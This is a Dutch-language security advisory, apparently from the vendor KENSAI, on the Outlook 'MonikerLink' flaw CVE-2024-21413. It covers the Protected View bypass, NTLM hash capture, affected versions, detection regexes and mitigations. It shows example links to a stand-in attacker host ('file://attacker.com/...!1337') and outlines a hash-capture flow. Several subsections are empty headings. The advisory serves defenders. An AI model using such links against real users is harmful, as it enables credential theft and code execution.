剣 KENSAI

CVE-2024-21413: Microsoft Outlook MonikerLink RCE

januari 2026 8 min leestijd beveiliging

Kort samengevat: CVE-2024-21413, bijgenaamd "MonikerLink", is een kritieke Microsoft Outlook-kwetsbaarheid die Protected View omzeilt om remote code execution en NTLM-credentialdiefstal te bereiken — simpelweg door een kwaadaardige e-mail in het voorbeeldvenster te bekijken. CVSS 9,8 KRITIEK. Geen gebruikersinteractie nodig behalve het bekijken van de e-mail in het voorbeeld.

9.8
KenmerkWaarde
CVE IDCVE-2024-21413
CVSS-vectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-20: Improper Input Validation
Gepubliceerd13 februari 2024
ExploitatiePublieke PoC — op grote schaal geëxploiteerd

CVSS 9,8 — KRITIEK

Wat is CVE-2024-21413?

CVE-2024-21413 misbruikt de manier waarop Microsoft Outlook hyperlinks verwerkt die het teken ! (uitroepteken) bevatten als onderdeel van een file-moniker-URI. Normaal gesproken past Outlook "Protected View" toe op documenten die vanuit e-mail worden geopend — waardoor Office-documenten in een sandbox draaien om codeuitvoering te voorkomen. Deze kwetsbaarheid omzeilt die bescherming volledig.

Door een hyperlink te constructen in het formaat file://ATTACKER-SERVER/test.rtf!something, laat een aanvaller Outlook het RTF-bestand openen zonder Protected View, terwijl tegelijkertijd automatisch een NTLM-authenticatiepoging naar de SMB-server van de aanvaller wordt getriggerd. De aanvaller vangt de NTLMv2-hash op voor offline kraken of relay-aanvallen.

🚨 Aanval via voorbeeldvenster — geen klik nodig

Deze kwetsbaarheid activeert in het Outlook-voorbeeldvenster. Het slachtoffer hoeft de e-mail alleen maar te selecteren in de inbox — geen bijlage openen, geen link aanklikken vereist. In een bedrijfsomgeving zou één phishing-e-mail naar een distributielijst honderden NTLMv2-hashes tegelijk kunnen compromitteren.

Getroffen producten

ProductGetroffen versies
Microsoft Outlook 2016Vóór de update van februari 2024
Microsoft Outlook 2019Vóór de update van februari 2024
Microsoft Outlook LTSC 2021Vóór de update van februari 2024
Microsoft 365 Apps for EnterpriseVóór de update van februari 2024

Niet getroffen: Outlook op het web (OWA), Outlook voor iOS/Android, Outlook voor Mac. De kwetsbaarheid is specifiek voor Windows desktop Outlook-clients.

Aanvalsmechaniek: de MonikerLink-techniek

Windows COM (Component Object Model) gebruikt "monikers" om objecten op naam te binden. Het URI-schema file:// in Windows kan een monikercomponent bevatten na het teken !, wat Windows instrueert om het genoemde COM-object te laden en te activeren.

# Normal file link — Protected View applied
file://attacker.com/share/document.rtf

# MonikerLink bypass — ! bypasses Protected View
file://attacker.com/share/document.rtf!1337

# When Outlook processes the MonikerLink:
# 1. Attempts SMB connection to attacker.com
# 2. Sends NTLMv2 authentication (captures hash)
# 3. Opens file without Protected View
# 4. If file is malicious RTF → RCE

NTLM-hash-captureflow

Zelfs zonder een gewapend RTF-bestand is de NTLM-relay-aanval impactvol:

  1. Slachtoffer bekijkt kwaadaardige e-mail in Outlook in het voorbeeld
  2. Outlook maakt automatisch een SMB-verbinding met de door de aanvaller gecontroleerde server
  3. Windows stuurt een NTLMv2-challenge-response (hash) om te authenticeren
  4. Aanvaller vangt de hash op met Responder, Impacket of vergelijkbare tools
  5. Hash offline gekraakt (zwakke wachtwoorden binnen uren) of realtime doorgestuurd naar andere diensten

Exploitatie in de praktijk

Na de publieke release van de PoC werd CVE-2024-21413 binnen enkele dagen opgenomen in commerciële phishingtoolkits. Waargenomen campagnes omvatten:

Detectie

E-mailgateway-regels

# Regex pattern for MonikerLink in email body/attachments
# Detect file:// links containing ! character
\bfile:\/\/[^\s"']+![^\s"']*

# Block external UNC/file links entirely (recommended)
\bfile:\/\/[^\s"']+
\\\\[a-z0-9.-]+\\

Netwerkdetectie

Endpointdetectie

Mitigatie

  1. Pas de patches van februari 2024 toe: de Microsoft Security Update voor Outlook verhelpt de Protected View-omzeiling
  2. Blokkeer SMB uitgaand aan de perimeter: firewallregels die TCP/445 en TCP/139 uitgaand blokkeren voorkomen NTLM-hashcapture, zelfs als de kwetsbaarheid wordt getriggerd
  3. Schakel NTLM-relaybescherming in: configureer SMB-signing en LDAP-signing om relay-aanvallen te voorkomen
  4. Implementeer een Email Security Gateway: blokkeer e-mails met file://- en \\-links (UNC-pad) in de body en bijlagen
  5. Schakel NTLM uit waar mogelijk: organisaties die Kerberos gebruiken, kunnen NTLM uitschakelen om het hash-capture-aanvalspad te elimineren

💡 Defense in Depth: zelfs als Outlook gepatcht is, is het blokkeren van uitgaande SMB aan de firewall een best practice die deze hele aanvalsklasse voorkomt. Veel organisaties staan uitgaande SMB toe vanwege legacy-bestandsdeling — audit en beperk dit onmiddellijk.

KENSAI-detectiemogelijkheden

Zijn uw Outlook-clients gepatcht tegen MonikerLink?

KENSAI scant uw endpointvloot op kwetsbare Outlook-versies en identificeert netwerkpaden die NTLM-hashcapture mogelijk zouden maken. Krijg in enkele minuten inzicht.

Beoordeel uw e-mailaanvalsoppervlak